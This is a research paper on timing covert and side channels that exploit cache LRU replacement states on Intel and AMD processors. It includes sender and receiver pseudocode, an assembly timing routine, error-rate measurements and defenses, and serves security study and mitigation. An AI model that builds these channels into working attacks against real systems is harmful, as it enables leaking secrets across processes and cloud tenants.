DeepAI
Log In Sign Up

Leaking Information Through Cache LRU States

The widely deployed Least-Recently Used (LRU) cache replacement policy and its variants are an essential component of modern processors. However, we show for the first time in detail that the LRU states of caches can be used to leak information. The LRU states are shared among all the software that accesses the cache and we show that timing-based channels are possible: any access to a cache by a sender will modify the LRU states, and the receiver is able to observe this through a timing measurement. This paper presents LRU timing-based channels both when the sender and the receiver have shared memory, e.g., shared library data pages, and when they are fully separate processes without shared memory. In addition, the new LRU timing-based channels are demonstrated on both Intel and AMD processors in scenarios where the sender and the receiver are sharing the cache in both hyper-threaded setting and time-sliced setting. The transmission rate of the new LRU channel can be up to 600Kbits/s per cache set in the hyper-threaded setting. Different from the existing cache channels which require the sender to have cache misses, the new LRU channels work with cache hits, making the channel faster and more stealthy as no cache misses are required for the sender. This paper also demonstrates that the new LRU channels can be used in transient execution attacks, e.g., Spectre, to retrieve the victim's secret. Further, this paper presents evaluation showing that the LRU channels also pose threats to existing secure cache designs. Possible defenses against the LRU timing-based channels are discussed and evaluated in simulation, with defense features added to protect the LRU states.

READ FULL TEXT VIEW PDF
04/17/2021

Abusing Cache Line Dirty States to Leak Information in Commercial Processors

Caches have been used to construct various types of covert and side chan...
09/30/2020

Timing Cache Accesses to Eliminate Side Channels in Shared Software

Timing side channels have been used to extract cryptographic keys and se...
06/26/2021

Evaluation of Cache Attacks on Arm Processors and Secure Caches

Timing-based side and covert channels in processor caches continue to be...
06/06/2020

Bankrupt Covert Channel: Turning Network Predictability into Vulnerability

Recent years have seen a surge in the number of data leaks despite aggre...
08/09/2019

Advanced profiling for probabilistic Prime+Probe attacks and covert channels in ScatterCache

Timing channels in cache hierarchies are an important enabler in many mi...
12/04/2019

L3 Fusion: Fast Transformed Convolutions on CPUs

Fast convolutions via transforms, either Winograd or FFT, had emerged as...
01/27/2022

CacheFX: A Framework for Evaluating Cache Security

Over the last two decades, the danger of sharing resources between progr...

I Introduction

Side channels and covert channels in processors have been gaining renewed attention in recent years. Many of these side channels leverage the timing information, and especially the differences between the timing of certain operations that are affected by the processor state. To date, researchers have shown numerous timing-based channels in caches, e.g., [1, 2, 3, 4, 5, 6], as well as other parts of the processor, such as the shared functional units in SMT processors, e.g., [7, 8, 9, 10, 11, 12, 13]. The canonical example of timing channels are the channels in processor caches, where timing reveals information about the state of the processor cache. This in turn can be used to leak information such as cryptographic keys [14, 15, 16, 3, 17]. Many of the variants of the recent Spectre and Meltdown attacks also use covert channels in addition to transient execution to exfiltrate data [18, 19, 20].

All existing cache attacks in peer-reviewed literature require a cache miss by a sender to replace some data in the cache, the miss (or lack there of) causes a timing difference when a latter access is made by a receiver. Meanwhile, this paper presents a new cache timing-based channels in processors, which are based on sender making cache accesses (no matter hits or misses).

In processors, the order in which the cache lines are evicted depends on the cache’s replacement policy and the state. Normally, different variants of the Least-Recently Used (LRU) policy are implemented in modern processors, such as Tree-PLRU [21] or Bit-PLRU [22]. LRU state is maintained for each cache set, and it is used to determine which cache line in a cache set should be replaced when there is a cache miss causing a cache replacement. The LRU state is updated on every cache accesses to indicate which cache line in the set was just accessed. Thus, both cache hits and misses in the set cause updates to the LRU state of the set.

One important feature of the new LRU timing-based channels is that the sender process does not have to trigger cache replacement (e.g., no data needs to be evicted from the cache) compared to all other cache timing-based side channels. LRU channel works even when the sender only triggers a cache hit, and the receiver later triggers a possible replacement to measure the time. This feature benefits the transient execution attacks, as only a small speculation window is required for the attacker.

The new LRU timing-based channels are also a threat to many of the existing secure caches proposals. Numerous secure caches [23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33] have been presented, and they aim to either partition or randomize the victim’s and the attacker’s cache accesses to defend the cache timing-based side channels. However, most of the secure caches have not considered the LRU states and are vulnerable to the new LRU attack. This paper demonstrates the problems with LRU states, and fixes them, for the case of the well-known Partition-Locked (PL) cache [24].

In this paper, the new LRU timing-based channels are demonstrated and evaluated in-depth for the first time. The biggest challenge of the LRU channels is how the receiver can accurately observe which level of cache a memory access hits in – i.e., how to measure the timing precisely. This paper proposes to use dedicated data structures and a pointer chasing algorithm in the receiver’s program to allow for fine-grained measurements of the latency of memory accesses. Further, two algorithms are designed to build LRU timing channels both with and without shared memory between the sender and the receiver, making the LRU channels practical in a variety of attack scenarios. We evaluated the LRU channel on a number of commercial processors including Intel and AMD processors with different micro-architectures, and both hyper-threaded and time-sliced sharing settings are considered. The LRU channels are also demonstrated to be usable in a Spectre attack.

To mitigate the new LRU timing-based channels, a number of defenses are discussed and evaluated. Further, as an example, secure PL cache design [24] is evaluated with the LRU channel and shown to have vulnerability with the LRU states. The design is then improved to defend the LRU attacks and evaluated in simulation.

I-a Contributions

The contributions of this work are as follows:

  • The first detailed presentation of how the LRU states in caches can be used as a timing-based side and covert channels for information leaks, both with and without shared memory between the sender and the receiver.

  • Detailed analysis and evaluation of a practical way to transfer information via the LRU channels. Evaluation of the transmission rates and bit error rates of the LRU covert channels on both Intel and AMD processors. Comparison of the LRU channels with the existing cache channels from the perspective of encoding time and cache miss rates.

  • Demonstration of how the LRU channels can be used in transient execution attacks.

  • Proposal for and evaluation of mitigations of the LRU channels, which can be applied to micro-architecture designs.

  • Demonstration of how the LRU channels break the security of PL cache [24], and how it can be fixed.

Ii Background

CPU caches leverage the temporal and spatial locality of memory accesses in programs to reduce memory access latency. Data blocks are stored in caches as the cache lines. If data in a cache line is requested, it will be served faster. Set-associative cache is the most common cache structure as a result of design trade-off between performance and hardware complexity. In set-associative caches, a cache line can only be in the cache set its address maps to, and later only that cache set needs to be looked up for the cache line. An -way set-associative cache has entries in each cache set.

Ii-a Existing Timing-Based Cache Side and Covert Channels

Caches have been leveraged to build timing-based side and covert channels in processors. The cache side channels have been shown to enable attackers to steal secret keys across different security domains and across processor cores, e.g., [1, 2, 3, 4]. The recent Spectre, Meltdown, and their variants can use cache covert channels in transient execution [18, 19, 20], which poses a further risk to modern computers. Whether a cache line is in cache or not affects the timing of the cache operations, and different programs or threads can affect each other by accessing data in the same cache. Two examples of attacks are listed below:

Flush+Reload attack [1]: A cache line is first flushed out of the cache. Next, the sender accesses the cache line, or not, depending on the message to be sent, i.e., the sender has a cache miss to trigger a replacement (if accessed) or not (if not accessed). In the last step, the receiver accesses (i.e., reloads) the same cache line, and measures the time of the access. If the last access is a cache hit (small access latency), the receiver can infer that the sender accessed the line.

Prime+Probe attack [2]: First, the receiver occupies a whole cache set by accessing different cache lines mapping to a set. Next, the sender accesses a cache line in the set, or not, depending on the message to be sent, i.e., the sender again has a cache miss to trigger a replacement (if accessed) or not (if not accessed). In the last step, the receiver probes all the cache lines used in the first step, and measures the time of the accesses. If the one of the accesses is a cache miss (large access latency), the receiver can infer that the sender accessed the cache set in the second step.

Many other attacks exist as well. They all, however, have the distinction of requiring a cache miss (or no access) to occur when the sender is sending information. Meanwhile, any cache access, both cache hit or miss, can trigger the new LRU attack.

Ii-B Cache Replacement Policy

When a cache line is accessed but it is not in the cache (i.e., a cache miss), the cache line will be fetched into the cache set. In this case, another cache line needs to be evicted from the cache set to make room for the incoming cache line. The replacement policy selects a cache way from the set to evict, known as the victim way. The replacement algorithm uses some state to store the history of accesses to cache ways in a given set. There are a number of replacement algorithms, such as random replacement policy, First-In First-Out (FIFO) replacement policy, and LRU replacement policy. Among them, in L1 cache, the LRU policy and its variants are most widely used because they give high cache hit rate. In last level cache (LLC), due to the reduced data locality, other replacement policies are proposed [34].

LRU: The LRU algorithm keeps track of the age of cache lines, using bits per cache line per way in an -way cache to store the age of the line. If a cache replacement is needed on a cache miss, the least recently used cache way (i.e., oldest way) will be selected to be the victim way and it will be evicted. The “true” LRU algorithm is expensive in terms of latency (to update LRU states) and area (to store the age of all the cache lines). This makes it prohibitive when the cache associativity is greater than 4, so often a variant of a Pseudo Least-Recently Used (PLRU) is used instead.

Tree-PLRU: The Tree-PLRU [21] uses a binary tree structure to keep track of the cache access history in a cache set. For an -way set-associative cache, the tree has nodes with each taking 1 bit, for a total of bits for each cache set to store the access history of all the cache ways. Each tree node indicates whether the left sub-tree or the right sub-tree has been less recently used. To find the victim way, the replacement algorithm starts from the root and always goes to the less recently used child to find the leaf node that indicates the victim way. To update the Tree-PLRU when a cache line in a way is accessed, all the nodes on the path from the root to the accessed way’s leaf node are set to point to the child that is not the ancestor of the accessed cache way.

Bit-PLRU: The Bit-PLRU [22], which is also called Most Recently Used (MRU), uses one bit to store the history of each cache way, called MRU-bit. For an -way cache set, a total of bits are required. When a way is accessed, its MRU-bit will be set to 1, indicating the way is recently used. Once all the ways have the MRU-bit set to 1, all the MRU-bits are reset to 0. To find a victim, the way with the lowest index whose MRU-bit is 0 is chosen. The logic of the Bit-PLRU is simpler than Tree-PLRU.

Iii Threat Model and Assumptions

Fig. 1: Cache organization and the steps of the LRU timing-based side or covert channel.

We assume set-associative caches and further assume the cache uses an LRU or PLRU replacement algorithm which evicts the least recently used cache line. Like all other side or covert channels, the LRU timing-based channel involves two parties: the sender and the receiver. Following techniques used in [35, 36], we assume the two process can be co-located on the same core to share the L1 cache, as shown in Figure 1, either in an SMT machine as two hyper-threads running in parallel or as two threads time-sharing the core. Existing attacks show that sharing the same physical core is practical and poses real threats to computer systems, such as due to side channels [9, 10, 11, 12, 13] or Spectre attacks leveraging BTB or RSB [18, 37, 38]. The LRU states of the shared cache can be influenced (by the sender) and observed (by the receiver).

In this paper, we focus on the LRU states in L1 cache. The LRU channels in the other levels of caches are also possible111Concurrently to this submission, a preprint paper [39] has been recently posed on arXiv on side channels that leverage the replacement policy in LLC. This work is compared to the preprint in Section X.. Depending on the cache architecture, for the sender to update the LRU states of the lower level of caches, a miss in the higher cache level is required, e.g., the sender’s accesses to L1 or L2 caches will not change the replacement state in the LLC. Especially, L1 is directly accessed by the processor pipeline and L1 LRU state is updated on every memory access. Thus, we focus on the L1 Data (L1D) cache.

If the sender is benign, but the processes happens to modify the LRU states based on some secret information, then this is an LRU side channel, and the sender is typically called the victim. If the sender is malicious, e.g., a small piece of malicious software trojan in a protected domain is used to pass the secret information out of the domain, then this is an LRU covert channel. In both cases, we assume the receiver can extract useful information from the memory access pattern of the sender, from the LRU states.

Iv LRU Timing-based Channels

The LRU timing-based channels leverage the LRU states of cache sets. In this section, we discuss how the LRU state in one cache set can be used to transfer information, which is referred to as the target set. In practice, several sets can be used in parallel to increase the transmission rate or to reduce the noise.

As introduced in Section II-B, the LRU state for each set contains several bits, thus it is possible to transfer more than 1 bit per target set. However, limited by the fact that any access to the set will change the LRU state, we focus on letting the receiver only measure the set once. Especially, the receiver can observe the timing of one memory access which can only have two results: a cache hit or a cache miss. Thus, at most one bit can be transferred per cache set at one time. To transfer information using an LRU channel, in general, there are three phases:

Initialization Phase: First, a sequence of memory accesses is performed so that the LRU state is partially known to the receiver. In a covert channel, this step can be done by either the sender, receiver, or jointly. In a side channel, this step has to be done by the sender.

Encoding Phase: To send information, the sender accesses one or more memory locations mapping to the target set to change the LRU state. The pattern of memory accesses depends on the information to be sent. For example, in the protocols in Section IV-A and IV-B, the sender conducts one memory access depending on the 1-bit message to be sent.

Decoding Phase: The receiver first accesses one or more memory locations mapping to the target set to potentially trigger a cache replacement and cause a cache line to be evicted based on the LRU state. The attacker then observes the timing of accessing the memory location to learn if the cache line is evicted and thus infer the LRU state.

Iv-a LRU Channel with Shared Memory

As shown in Algorithm 1, this is the first communication protocol which uses the LRU cache states in -way set-associative cache, and which assumes shared memory. Later, in Section IV-B, a protocol which does not require shared memory is presented. Both are designed to be light-weight in the encoding phase, where the sender only needs to do at most one memory access.

line -: different cache lines mapping to the target set
m: a 1-bit message to transfer on the channel
d: a parameter of the receiver
 
Receiver Operations:
 
// Step 0: Initialization Phase
for  do
        Access line i;
       
end for
sleep; // To allow the sender code to run here for encoding
// Step 2: Decoding Phase
for  do
        Access line i;
       
end for
Access line 0 and time the access;
 
Sender Operations:
 
// Step 1: Encoding Phase
if m=1 then
        Access line 0;
       
else
        Do not access line 0;
       
end if
Algorithm 1 LRU Channel with Shared Memory

The sender and the receiver first agree on the target cache set they will use to transfer information. We use the term line - to denote different cache lines that map to the target set. This can be achieved by using data in different physical addresses with the same cache index bits but different tag bits. Note that line () here refers to a cache line at a certain physical address not a specific cache entry. Line could be placed in any cache way in the set. Line - can be at any accessible addresses satisfying the above, the name does not imply certain literal physical address . In Algorithm 1, the sender and the receiver both need to use the same physical address (or a physical address within the 64-byte cache line boundary) to access cache line in the cache. This can be achieved by a memory location in a shared dynamic linked library, as in [1]. is a 1-bit message to be sent. is a parameter of the protocol that is chosen by the receiver.

In the initialization phase, the receiver first accesses cache lines, in order to set the initial LRU state of the target set. Then, in the encoding phase, the sender either accesses line or does not access it depending on the message to be sent (in this paper, access means to transfer bit , no access means to transfer bit ). In the decoding phase, the receiver first accesses the other lines. In total, the receiver accesses cache lines in the set. Thus, if the sender did not access line in the encoding phase, line will be evicted222With PLRU replacement algorithms, line 0 is not guaranteed to be evicted with this access sequence. However, as will be evaluated in Section IV-C, line 0 will be evicted in most of the cases., otherwise it will not, because its LRU position of the line will be set to newest during the encoding phase. To check this, the receiver can measure the time of accessing line to test if line is still in the cache or not (due to the sender’s access).

For example, when and , the sequence of memory accesses when sending is as follows:

  • Init. Phase:

  • Encoding Phase: no access

  • Decoding Phase: (miss)

In this 8-way set associative cache, line 0 will be chosen by the LRU policy as the victim way and will be evicted from L1 when accessing line 8, and the receiver will observe L1 miss when accessing line 0 in the end.

Meanwhile, the sequence of memory accesses when sending is as follows:

  • Init. Phase:

  • Encoding Phase: (hit)

  • Decoding Phase: (hit)

Here, line 0 will be in the cache all the time, especially during encoding phase, the access to line will make it become the newest line in the LRU state, and the remaining accesses in the decoding phase will not evict it. When the receiver measures the time of accessing line in the decoding phase, the receiver will observe an L1 cache hit, and the receiver can infer that the sender has .

Iv-B LRU Channel without Shared Memory

line -: different cache lines mapping to the target set
m: a 1-bit message to transfer on the channel
d: a parameter of the receiver
 
Receiver Operations:
 
// Step 0: Initialization Phase
for  do
        Access line i;
       
end for
sleep; // To allow the sender code to run here for encoding
// Step 2: Decoding Phase
for  do
        Access line i;
       
end for
Access line 0 and time the access;
 
Sender Operations:
 
// Step 1: Encoding Phase
if m=1 then
        Access line ;
       
else
        Do not access target set;
       
end if
Algorithm 2 LRU Channel without Shared Memory

Shared memory required in Algorithm 1 between the sender and the receiver is not always possible. In Algorithm 2, the sender and the receiver do not need to access any shared memory location. The sender only accesses line , while the receiver accesses line 0– in the target set.

Once the target set is decided, the sender and the receiver can map memory accesses to the target set by using proper virtual memory addresses in their own memory spaces. For performance, L1 cache is usually virtual-indexed and physical-tagged (VIPT). For example, for an L1 cache with 64 sets with a cache line size of 64 bytes, bits 6–11 of the address decide the cache set. Since the lower 12 bits in the virtual address and physical address are the same, the receiver can make sure lines 0– map to the same set as line by using memory locations with bits 6-11 of the virtual address to be the same as line .

In Algorithm 2, in the initialization phase, the receiver first accesses cache lines, in order to set the initial LRU state of the target set. Then in the encoding phase, the sender accesses line or does not, depending on the message to be sent (again access means and no access means ). In the decoding phase, the receiver accesses the other lines. Thus, when combining the initialization phase and the decoding phase, the receiver accesses cache lines in total, just fitting in the cache set which has ways. If the sender accesses line in the encoding phase, line will be chosen as the victim by the LRU policy in the decoding phase, and will be replaced by the cache line accessed by the receiver. Thus, if the receiver observes longer timing for accessing line , he or she knows that the sender sent .

For example, when and , the order of memory accesses when sending is as follows:

  • Init. Phase:

  • Encoding Phase: no access

  • Decoding Phase: (hit)

And the order of memory accesses when sending is:

  • Init. Phase:

  • Encoding Phase: (hit, if line 8 is in cache before Init. Phase)

  • Decoding Phase: (miss)

Whether the sender accesses line or not will change the LRU state, and in the decoding phase it will decide which line will be evicted if the sender’s access to line misses in the cache. The receiver will observe an L1 cache hit when accessing line if the sender is sending , and will observe an L1 cache miss if the sender is sending . Compared to Algorithm 1, there will be more noise on this channel, as any thread accessing the target set can cause line to be evicted. A miss of line does not necessarily mean that the sender accessed line . The noise is due to no shared memory, and other known cache side channel attacks (e.g., Prime+Probe channel [2]) also have this source of noise.

Iv-C PLRU vs. LRU Replacement Policy

In true LRU, the least recently used way is always chosen as the victim. For example, consider the following two memory accesses sequences in an 8-way cache, with each number representing accessing a line mapping to the set:

  • Sequence 1 (access in order): .

  • Sequence 2 (access in order with random insertion): . Here, line is a cache line that maps to this cache set and is different from lines . The parentheses indicate the access might happen or not, and we assume line will be accessed at least once.

If true LRU is used, line will be evicted in both sequences. However, in PLRU, line is not guaranteed to be evicted. Because PLRU uses less state bits to track the memory access history, the cache LRU state before the access sequence could still affect the choice of victim way, and longer history should be considered when analyzing the PLRU. Consider the following initial conditions before accessing the above sequence:

  • Random: The cache contains some of the lines

    and probably other lines, and the initial accessing order of lines

    is random.

  • Sequential: The cache contains some of the lines and probably other lines, and the initial accessing of lines is in sequential order (e.g., previous access to the set is accessed in order with random insertion like Sequence 2).

Init. Cond. Num. Loop Iter. LRU Tree-PLRU Bit-PLRU
Seq.
1&2
Seq. 1 Seq. 2 Seq. 1 Seq. 2
Random 100% 50.4% 62.7% 38.5% 55.5%
100% 82.8% 65.6% 55.6% 69.7%
100% 99.2% 64.2% 67.3% 80.1%
100% 100% 62% 100% 99%
Sequential 1 100% 90.9% 75.6% 60.4% 61.0%
2 100% 100% 65.9% 63.0% 64.1%
3 100% 100% 64.0% 67.3% 70.3%
100% 100% 62% 100% 99%
TABLE I: Probability of line being evicted with PLRU

We implemented an in-house simulator to simulate the Tree-PLRU [21] and Bit-PLRU [22] replace policies in an 8-way set. First, in the warm-up phases, we create accesses to the set for each of the possible initial conditions. For the random initial condition, random access sequences are used. For the sequential initial condition, Sequence 2 is used, with the probability of being accessed in each parentheses being . Then, Sequence 1 or Sequence 2 is accessed in a loop, and whether line is in the cache after each sequence is recorded for each loop iteration. We repeat the above test in the simulator for times for each configuration, and present results in Table I.

As shown in Table I, under random initial condition, line 0 might still be kept in the cache with a high probability. Meanwhile, sequential initial condition gives a high probability of line 0 being evicted after several loop iterations, especially for sequence 1 and the Bit-PLRU. Note that true LRU will always evict line 0.

In the above study, Sequence 1 is the access pattern of using Algorithm 1 sending . Sequence 2 is the access pattern of using Algorithm 2 sending in hyper-threaded sharing, where x is line 8. In hyper-threaded sharing, the memory accesses by different processes interleave in a random order. Loop iteration is the case when the receiver is measuring in a loop, while the sender is sending bits repeatedly. Random initial condition happens when some process is using line  in a random order. Sequential initial condition happens when line  are always accessed in order. In the two proposed LRU channels, if line 0 is still in the cache when it should be evicted according to true LRU, it will result in errors in the channel. The simulation results show that the sequential initial condition gives higher eviction rate. Thus, the receiver should ensure the sequential initial condition by placing line in the receiver’s address space and then always accessing them in order.

Iv-D Challenge: Measuring the Latency of L1 Hit and Miss

TABLE II: Latency of cache
access (cycles)
Microarchitecture L1D L2 Intel Sandy Bridge 4-5 12 Intel Skylake 4-5 12 AMD Zen 4-5 17
rdtscp movl %eax, %esi movq (%rbx),  %rax movq (%rax),  %rax movq (%rax),  %rax movq (%rax),  %rax movq (%rax),  %rax movq (%rax),  %rax movq (%rax),  %rax movq (%rax),  %rax rdtscp subl %esi, %eax Fig. 2: Pointer
chasing algorithm.

The major challenge for the receiver is to measure the memory access time precisely and to distinguish an L1 cache hit and an L1 cache miss (an L2 cache hit or longer). Table II shows the access latency of L1 hit and L1 miss on the microarchitectures we tested. L1 hit takes less than 5 CPU cycles, and L2 hit takes about 10-20 CPU cycles. Due to the noise caused by the serializing and the granularity of time stamp counter, using instruction (or and instructions) to measure the latency of a memory access cannot distinguish L1 hit from L2 hit. The measurement results of L1 hit and L2 hit are the same (shown in Appendix A).

Fig. 3: Histogram of access latencies of seven L1 hits and the 8th element being L1 hit or miss when measuring one target address with pointer chasing (left) on Intel Xeon E5-2690 and (right) on AMD EPYC 7571.

Thus, we propose to use pointer chasing algorithm and a dedicated data structure to measure one memory access precisely. In the pointer chasing algorithm in Figure 2, a linked list, where each element stores the address of the next elements, is required. In the code listed, the points to the head of the linked list. Since the address of the instruction depends on the data fetched from the previous instruction, all the eight accesses are serialized. However, in a side and covert channel scenario, it is not practical to use Algorithm 1 to build a linked list containing the sender’s memory access destination in a read-only shared library.

Instead of a linked list in the shared library, we use a linked list of 7 elements333The size of the linked list does not have to be 7. However, if the size is small, the noise by will affect the measurements. If the size is large, there will be noise in accessing the elements in the linked list. elements work in our experiments well. in the receiver’s own memory space, and let the 7 element contain the memory address to be measured. In this way, when measuring latency with the pointer chasing algorithm in Figure 2, it will first access 7 local elements and the target address at the end and measure the total time of the 8 serial memory accesses. Before running the measurement, the receiver can fetch the first 7 local elements to L1 cache, so the first 7 accesses will always hit in L1 and the total time depends on whether the 8th element is in L1 cache or not. Figure 3 shows the result of this measurement strategy (L1 hit of the first 7 elements and the 8th element being L1 hit or miss). The difference between an L1 hit and an L1 miss of the 8th element is distinguishable on Intel processors. On AMD processor, the latency of L1 hit and L1 miss show different distributions. To avoid the first 7 elements polluting the LRU state of the target set, one further optimization is to put the 7 elements in one cache set and any other set can be used as the target set.

V LRU Covert Channels in Intel Processors

m: k-bit message to be sent on the channel
: sender’s sending period
: receiver’s sampling time
TSC: current time stamp counter, obtained by
 
Sender Code:
 
for  do
        for an amount time  do
               Step 1: Encoding Phase, encoding m[k]
        end for
       
end for
 
Receiver Code:
 
while True do
        Step 0: Initializion Phase
        while TSC  do
               nothing;
        end while
       TSC
        Step 2: Decoding Phase
       
end while
Algorithm 3 Covert Channel Protocol
Model Intel Xeon E5-2690 Intel Xeon E3-1245 v5 AMD EPYC 7571
Microarchitecture Sandy Bridge Skylake Zen
Number of cores 8 4 N/A
L1D size of each core 32KB 32KB 32KB
L1D associativity 8-way 8-way 8-way
L1D number of sets 64 64 64
Frequency 3.8GHz 3.9GHz 2.5GHz
OS 16.04.1 Ubuntu
  • We use the AMD processor on Amazon AWS EC2 platform. The CPU model is specific for Amazon AWS. One core was leased for our experiments.

TABLE III: Specifications of the tested CPU models

To evaluate the transmission rate of the LRU channel, we evaluate it as a covert channel using one target set in the L1D cache. As shown in Algorithm 3, the sender sends each bit of message for CPU cycles, by running the sender’s operations (in Algorithm 1 or 2) for in a loop for each bit in the message that the sender wants to send. decides the transmission rate. We calculate the transmission rate with the total number of bits sent divided by the time (measured by in Linux). The receiver runs the receiver’s operations (in Algorithm 1 or 2) every CPU cycles in a loop and measures the latency using pointer chasing discussed in Section IV-D.

In this section, the evaluation is conducted on Intel Xeon E5-2690 and Intel Xeon E3-1245 v5. The specifications of the tested CPU models are listed in Table III. We evaluated both LRU Channel with shared memory and without shared memory presented in Section IV under both hyper-threaded sharing and time-sliced sharing settings.

V-a LRU Channels in Hyper-Threaded Sharing

For the hyper-threading case, we tested the covert channel when the sender and the receiver are sharing the same physical core as two hyper-threads. Each of the sender and the receiver is a process (i.e., a separate program) in Linux.

Fig. 4: Transmission error rate (evaluated by edit distance) as a function of the transmission rate (different ) for different on Intel Xeon E5-2690 using (top) Algorithm 1 and (bottom) Algorithm 2.
Fig. 5: Example sequences of receiver’s observation when the sender is sending 0 and 1 alternatively on Intel Xeon E5-2690 with a transmission rate of 480Kbps using (top) Algorithm 1 with , , and and (bottom) Algorithm 2 with , and . The blue dots show the latencies observed by the receiver, and the red dot line shows the threshold of the L1 cache hit.

LRU Channel with Shared Memory: In Algorithm 1, shared memory is needed among the sender and the receiver processes, e.g., achieved by a shared library. Figure 5 (top) shows the traces observed by the receiver when the sender is sending 0 and 1 alternatively on both processors tested with , , and . When the sender is sending bit 1, the access time of line 0 by the receiver is smaller, as is discussed in Section IV-A. Due to the space limit, only the results on Intel Xeon E5-2690 is shown in Figure 5 (and the results on E3-1245 v5 are in Appendix B). The two processors shows similar results, except that the two processors have different thresholds of L1 hit and miss latency. This is due to different latencies for L1 or L2 cache access on the two. Also, the two processors are running at different frequencies, and thus, even with the same , the transmission rate is 480Kbps for E5-2690 and 580Kbps for E3-1245 v5.

To evaluate the error rate of the channel, we evaluate the case where the sender process sends a random 128-bit binary string repeatedly. There are 3 types of errors in the channel: 1) bit flips, 2) bit insertions, or 3) bit loss. To evaluate the error rate of the channel, the edit distance between the sent string and the received string is calculated using the Wagner-Fischer algorithm [40]. For each test, the 128-bit string is sent at least 30 times, and the average errors of the trials is calculated.

The receiver’s operations of Algorithm 1 in total takes about 560 cycles on both CPUs tested without sleep, including logging of the results. As shown in Algorithm 3, the receiver will sleep, until cycles have been reached, thus, . Thus, we evaluate cycles. In the sender process, sending period are tested. We test parameter , since the processors have 8-way set-associative caches and the maximum possible is .

Figure 4 (top) shows the error rate of the channel versus the different transmission rates (i.e., different values of ). As shown in the figure, does not affect the error rate much on the E5-2690. This is because in hyper-threaded sharing, the sender process and the receiver process execute in parallel. The sender operation can happen when the receiver is executing any part of his or her operation, and only makes the sender operation more likely to happen in the sleep part of the receiver’s operation. gives slightly better error rate than , this might be because more interleaving between the two threads due to larger and the receiver can observe more sender’s activity in one measurement. As increases to cycles, the error rate increases. In general, the error rate increases as the transmission rate increases (i.e., decreases). This is because a greater or a smaller will result in more measurements for each of the bit transmitted, and the noise can be cancelled out by taking the average of the measurement results.

LRU Channel without Shared Memory: In Algorithm 2, shared memory is not required among the sender and the receiver processes. Figure 5 (bottom) shows the traces observed by the receiver, when , and . When the sender is sending bit 1, the access time of line 0 by the receiver is larger, due to sender’s access to the same set, as is discussed in Section IV-B.

For Algorithm 2, we also evaluate cycles, cycles and on both CPU models. Figure 4 (bottom) shows the error rate versus the different transmission rates (different values of ) on E5-2690. Compared to LRU channel with shared memory, LRU channel without shared memory has more noise. As indicated in the simulation result of accessing sequence 2 in Section IV-C, in Tree-PLRU, when the sender access the set, the receiver may not observe a miss in the end, resulting in a false 0. Also, any access to the same set (by the other part of the program or other processes on the core) may result in a false 1. However, these errors usually occur consecutively in time. So the receiver can detect the noise if observing a long sequence of all 1 or all 0. We exclude those traces to obtain Figure 4.

When , the error rate is large on E5-2690, especially when is large. This may due to that even makes the Tree-PLRU state point to another side of the subtree, and the receiver will not evict line 0 in the decoding phase. The trend of the error rate is similar to that of the LRU channel with shared memory.

V-B LRU Channels in Time-Sliced Sharing

Fig. 6: Percentage of 1’s observed by the receiver on Intel Xeon E5-2690, when the sender is sending (left) 0 and (right) 1 using Algorithm 1 under time-sliced sharing.

When the sender and receiver are sharing the same core in a time-sliced sharing setting, the two processes still share the same L1 cache. To evaluate the covert channel in a time-sliced sharing setting, we programmed the sender process to always send 1 or 0, and the receiver to measure the time of accessing line 0 every .

Figure 6 shows the percentage of 1’s received for different and when the sender is sending 0 or 1 using Algorithm 1 on both CPUs tested. Each data point comes from 1000 measurements.

As is shown in Figure 6, with proper parameters, the receiver can distinguish between sender sending 0 and 1. For example, if and cycles, the receiver will observe almost 100% of bit 0 when the sender is sending 0, and the receiver will observe about 30% of bit 1 when the sender is sending 1 on both Intel processors. The receiver does not observe 1 with a higher probability, because in time-sliced sharing, each process uses the core for a certain period of time. When the receiver monitors the sender in a loop, multiple loop iterations will run within a time-slice period, and only the first iteration will reflect the sender’s behavior, the other iterations in the time period run without interleaving with the sender. Nevertheless, the receiver can still recognize the message the sender is sending by the percentage of 1’s received. Assuming 10 measurements are needed when to differentiate from , the transmission rate is about 2.4 bits per second.

Compared to hyper-threaded sharing, much larger is needed here to have interaction between the two threads (about cycles for both processors tested). However, if is too large, the distinguishability decreases, as other processes might be scheduled during . As is shown in Figure 6, and gives the best distinguishability between the sender sending 0 and 1. This is because when is large, the time for the receiver’s operations becomes small compared to the sleep time. Thus, the context switch is more likely to happen during the sleep time. In Algorithm 1, a bigger will have less access to the target set after the sleep, and line 0 is less likely to be evicted in the decoding phase.

We also tried to demonstrate Algorithm 2 but failed to observe any signal from the measurement. We think the reason is that the should be large to allow interference between the sender and the receiver, however, any other processes running during could pollute the target set and introduce much noise.

Vi LRU Covert Channels in AMD Processors

In this section, we evaluate the characteristics of the LRU covert channel on AMD EPYC 7571 processor on Amazon AWS EC2 platform. The specification of the tested processor is listed in Table III. The methodology of the evaluation is similar to that on Intel processors in Section V.

Vi-a Measuring Access Latency on AMD Processors

As shown in Section IV-D Figure 3, the latency measured by instruction using the time stamp counter on AMD processor has coarser granularity, compared to Intel processors444There is also Actual Performance Frequency Clock Count in AMD. But it is only accessible from Ring-0, which does not fit with our threat model.. Thus, the receiver needs to take multiple repeated measurements and take the average to determine if it is an L1 hit or not, this lowers the bandwidth of the channel.

Vi-B LRU Channel with Shared Memory

For power-savings, AMD L1 cache has a special linear address utag and way-predictor (see 2.6.2.2 in [41]). The utag is a hash of the linear address. For a load, while the physical address is looked up in TLB, the L1 cache uses the hash of the linear address to match the utag and determines which cache way to use in the cache set. When the physical address is available, only one cache way will be looked up instead of all 8 ways. So, when the physical address of a load matches a cache line in the cache, if the utag of that way is of a different linear address, unless the hash of two linear addresses conflicts, a latency of an L1 miss will be observed, even though the physical address matches and data is in the L1 cache.

This makes our Algorithm 1 across processes using different address spaces limited. If the sender process accesses line 0, the utag of line 0 will be updated with the linear address of line 0 in the sender’s address space. When the receiver accesses line 0 and measures the time, unless the hash of the linear address of line 0 in the sender’s process and in the receiver’s process conflicts, the receiver will always observe an L1 cache miss latency no matter if the line 0 is in L1 or not. However, the hash of utag is not designed for security and is possible to be reverse-engineered.

Fig. 7: Example sequences of receiver’s observation when the sender is sending 0 and 1 alternatively using (top) Algorithm 1 and (bottom) Algorithm 2 on AMD EPYC 7571. For Algorithm 1, , , , and the transmission rate is 22Kbps. For Algorithm 2, , , , and the transmission rate is 25Kbps. The light blue dot line shows the moving average.
Fig. 8: Percentage of 1’s observed by the receiver on AMD EPYC 7571, when the sender and receiver are sharing a core in a time-slice setting and the sender is sending (left) 0 and (right) 1 using Algorithm 1.

